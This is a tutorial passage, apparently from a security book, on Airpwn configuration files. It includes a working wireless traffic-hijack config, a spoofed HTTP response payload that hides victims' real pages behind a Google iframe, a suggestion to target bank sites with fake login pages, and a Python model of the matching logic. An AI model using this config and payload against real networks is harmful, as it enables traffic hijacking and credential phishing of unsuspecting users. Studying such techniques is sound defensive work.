Airpwn configuration files are simple text files that contain one or more request/response blocks. Each block starts with the begin directive, followed by a match expression, an optional ignore expression, and a response filename, one directive per line.
The match expression is a regular expression that is applied to every wireless packet sent from a client to the AP. If the expression matches, the contents of the file named by the response directive are injected to the client, spoofed so that they appear to come from the AP. If an ignore expression is also specified, injection happens only when the match expression matches and the ignore expression does not. Both the match and ignore expressions use Perl Compatible Regular Expression (PCRE) syntax (see the pcrepattern manpage for details).
Here is an example configuration file that injects the contents of file.txt when a packet containing the string cat but not dog is seen:
begin catnotdog
match cat
ignore dog
response file.txt
The string after the begin keyword is the name of the request/response pair. It is displayed in the logs when the content is injected so that you know which data was just sent, since multiple request/response pairs can be active at any time.
Here's a more real-world example of a configuration file for performing site hijacking. The match expression finds HTTP requests, and the ignore expression skips any images or requests to the Google web site (you'll see why shortly):
begin site_hijack
match ^(GET|POST).*
ignore (^GET [^ ?]+\.(?i:jpg|jpeg|gif|png|ico|css)|(?i:host: .*google.com))
response site_hijack.txt
The file site_hijack.txt contains a spoofed HTTP response that creates a fullscreen iframe containing the Google search page and hides the real web page inside an HTML comment in a hidden div. Google has to be in the ignore expression because the iframe itself issues requests to google.com; without the exemption those requests would match too and be answered with yet another copy of the hijack page, recursing without end. Here is the content of site_hijack.txt:
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Content-Length: 250

<html>
<head><title>hugs</title></head>
<body>
<iframe frameborder=0 border=0 src="http://google.com" width="100%" height="100%">hugs</iframe>
<div style="visibility:hidden;position:absolute;x:-5000;y:-5000;">
BYE BYE!
<!--
The div and the trailing comment are deliberately left unclosed: any real page data the browser receives after the spoofed response is parsed as comment text inside the hidden div and never rendered. The whole file is only 333 bytes, which fits cleanly into a single wireless frame and avoids any problems with uncooperative wireless drivers.
The result of this configuration is that every web page the victim goes to becomes the Google search page. In effect, the entire Internet is now Google. This is a rather innocuous example. If, for instance, you limited the match expression to only trigger on bank web sites, and instead replaced the victim's page with your own fake bank login page, things could get nasty rather quickly.
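To make the match/ignore semantics of both configurations above concrete, here is a small Python model of how airpwn decides which block fires on a given client packet. This is an added example, not airpwn's own code: it assumes one directive per line with the rest of the line as the argument, substitutes Python's re module for PCRE (it accepts the (?i:...) groups the examples use), and feeds in constructed HTTP requests rather than captured frames.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed airpwn-style configuration reproducing the two blocks from the text.
# Assumption: one directive per line, with the rest of the line as its argument.
SAMPLE_CONF = r"""
begin catnotdog
match cat
ignore dog
response file.txt

begin site_hijack
match ^(GET|POST).*
ignore (^GET [^ ?]+\.(?i:jpg|jpeg|gif|png|ico|css)|(?i:host: .*google.com))
response site_hijack.txt
"""


@dataclass
class Block:
    name: str                     # string after "begin"; airpwn logs it on injection
    match: re.Pattern
    ignore: Optional[re.Pattern]
    response: str                 # filename whose contents would be injected


def _finish(cur: dict) -> Block:
    """Validate one begin..response group and compile its expressions."""
    if "match" not in cur or "response" not in cur:
        raise ValueError(f"block {cur.get('name')!r} needs both match and response")
    return Block(
        name=cur["name"],
        match=re.compile(cur["match"]),
        ignore=re.compile(cur["ignore"]) if "ignore" in cur else None,
        response=cur["response"],
    )


def parse_conf(text: str) -> List[Block]:
    """Parse begin/match/ignore/response directives into Block objects.

    Python's re stands in for PCRE here (an assumption of this example).
    """
    blocks: List[Block] = []
    cur: dict = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        if key == "begin":
            if cur:
                blocks.append(_finish(cur))
            cur = {"name": value.strip()}
        elif key in ("match", "ignore", "response"):
            if not cur:
                raise ValueError(f"{key!r} directive before any begin")
            cur[key] = value.strip()
        else:
            raise ValueError(f"unknown directive {key!r}")
    if cur:
        blocks.append(_finish(cur))
    return blocks


def select_responses(blocks: List[Block], payload: str) -> List[str]:
    """Names of every block that would fire on one client-to-AP payload.

    A block fires when its match expression matches and its ignore expression,
    if present, does not. Several blocks can fire on the same packet, which is
    why airpwn logs the block name with each injection.
    """
    fired: List[str] = []
    for b in blocks:
        if not b.match.search(payload):
            continue
        if b.ignore is not None and b.ignore.search(payload):
            continue
        fired.append(b.name)
    return fired


if __name__ == "__main__":
    # Constructed client requests, CRLF-terminated as a browser would send them.
    requests = [
        "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
        "GET /logo.png HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
        "GET /search?q=airpwn HTTP/1.1\r\nHost: www.google.com\r\n\r\n",
        "GET /cats.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
        "GET /cat-and-dog.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
    ]
    conf = parse_conf(SAMPLE_CONF)
    for req in requests:
        print(req.split("\r\n")[0], "->", select_responses(conf, req) or "no injection")
```

Running it shows the three cases the ignore expression exists for: the image request and the request carrying a google.com Host header are left alone, a plain page fetch triggers site_hijack, and a request that happens to contain both "cat" and "dog" is skipped by catnotdog while still being hijacked, since every active block is evaluated independently against the same packet.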
Airpwn provides a number of example configuration files in the source distribution under the conf subdirectory. Looking through the examples is probably the best way to get ideas on what you can do with Airpwn.